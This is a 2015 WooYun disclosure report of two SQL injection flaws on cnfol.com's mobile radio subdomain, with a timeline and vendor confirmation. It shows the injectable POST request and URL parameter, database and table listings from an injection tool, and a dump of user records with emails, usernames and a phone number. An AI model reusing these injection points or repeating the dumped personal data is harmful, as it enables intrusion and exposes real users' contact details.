当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134191

漏洞标题:中金在线某站俩处MySQL注射(手机号/email泄露)

相关厂商:福建中金在线网络股份有限公司

漏洞作者: 路人甲

提交时间:2015-08-15 15:48

修复时间:2015-10-01 09:22

公开时间:2015-10-01 09:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-15: 细节已通知厂商并且等待厂商处理中
2015-08-17: 厂商已经确认,细节仅向厂商公开
2015-08-27: 细节向核心白帽子及相关领域专家公开
2015-09-06: 细节向普通白帽子公开
2015-09-16: 细节向实习白帽子公开
2015-10-01: 细节向公众公开

简要描述:

手机+email

详细说明:

post注入

POST /index.php?r=Radiostation/MoreMingjia HTTP/1.1
Content-Length: 12
Content-Type: application/x-www-form-urlencoded
Referer: http://radio.3g.cnfol.com/
Host: radio.3g.cnfol.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
offset=1


1.jpg


2.jpg


3.jpg


database management system users privileges:
[*] %fol_g3zbrd% [1]:
privilege: USAGE


3.jpg


available databases [3]:
[*] cnfol_zjcj
[*] information_schema
[*] test


Database: cnfol_zjcj
[38 tables]
+---------------------+
| Activity |
| Bl_Install |
| Bl_Keywords |
| Bl_Reflex |
| Bl_UserMobile |
| Bl_classify |
| Bl_contentfilter |
| Bl_resource |
| Bl_user |
| GK_AttenList |
| Invitation |
| InvitationCode |
| InvitationExchange |
| WdtVoice |
| WdtVoiceCount |
| backupZjcj_group |
| bk_blacklist |
| bk_flower |
| bk_group |
| bk_live |
| bl_con |
| bl_ref |
| bl_secret |
| syslog |
| tbAppStock |
| tbUserStockOptional |
| unscramble |
| unscramblexx |
| weidiantai1 |
| zjcj_androiddevice |
| zjcj_content |
| zjcj_content_201507 |
| zjcj_group |
| zjcj_iosdevice |
| zjcj_operate |
| zjcj_user |
| zjcj_userchat |
| zjcj_userjoin |
+---------------------+


+-----------------+--------------+-------------+-------------+-------------+--------+
| email | userName | userNick | replyNumber | mobile | manage |
+-----------------+--------------+-------------+-------------+-------------+--------+
| aaa@hotmail.com | pzpz | pzpz | 0 | <blank> | 1 |
| <blank> | 5518 | 天顺居士 | 0 | <blank> | 0 |
| <blank> | woshishui | chaochao | 0 | <blank> | 0 |
| <blank> | qiyongwei123 | qiyw | 0 | <blank> | 0 |
| 1blog3@163.com | blog | blog1 | 0 | <blank> | 1 |
| buluo@163.com | buluo | buluo | 0 | <blank> | 0 |
| sq@hotmail.com | sq | 舒淇 | 0 | <blank> | 0 |
| ds@hotmail.com | ds | 大S | 0 | <blank> | 0 |
| <blank> | wqh | wqh | 0 | <blank> | 0 |
| <blank> | kx | 开心果 | 0 | <blank> | 0 |
| <blank> | ly | 驴行天下1 | 0 | <blank> | 0 |
| aa@78.com | hihi | hihi | 0 | <blank> | 1 |
| <blank> | ns | 超级女生 | 0 | <blank> | 0 |
| bdjs@sohu.com | bdjs | bdjs | 0 | <blank> | 0 |
| <blank> | syatao | syatao | 0 | <blank> | 0 |
| sp@hotmail.com | sp | 水皮1 | 0 | <blank> | 0 |
| <blank> | fomu998 | 灯下读贴 | 0 | <blank> | 0 |
| <blank> | 66236F | 662368 | 0 | <blank> | 0 |
| <blank> | zzm680920 | 吉利一尘 | 0 | <blank> | 0 |
| <blank> | gaofenger | gaofenger | 0 | <blank> | 0 |
| <blank> | jmlu62426 | mingming405 | 0 | <blank> | 0 |
| <blank> | jack_cchen | jackcchen | 0 | <blank> | 0 |
| <blank> | aris2370 | aris2370 | 0 | <blank> | 0 |
| <blank> | tigerhu188 | 金天传奇 | 0 | <blank> | 0 |
| <blank> | nec511 | 冷 心 | 0 | <blank> | 0 |
| <blank> | gaoshang99 | gaoshang99 | 0 | <blank> | 0 |
| <blank> | A9818 | 剑杰8 | 0 | <blank> | 0 |
| <blank> | lw520165 | saxon鱼 | 0 | <blank> | 0 |
| <blank> | pigliwu | 中金用户PH | 0 | <blank> | 0 |
| <blank> | lifhaihe | lftj | 0 | 13821389989 | 0 |
| <blank> | x46134587 | 温暖梦想 | 0 | <blank> | 0 |
| <blank> | sabatilla | sabatilla | 0 | <blank> | 0 |
| <blank> | wgx168 | wgx168 | 0 | <blank> | 0 |
| <blank> | laoynihao | 逍遥啊鹰 | 0 | <blank> | 0 |
| <blank> | wwyymm2005 | 肥肥2005 | 0 | <blank> | 0 |


=========================================================
另外一处

http://radio.3g.cnfol.com/index-test.php?id=&r=Radiostation/Dragonfly


注入参数id

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-08-17 09:20

厂商回复:

谢谢,我们会立即处理掉漏洞。

最新状态:

暂无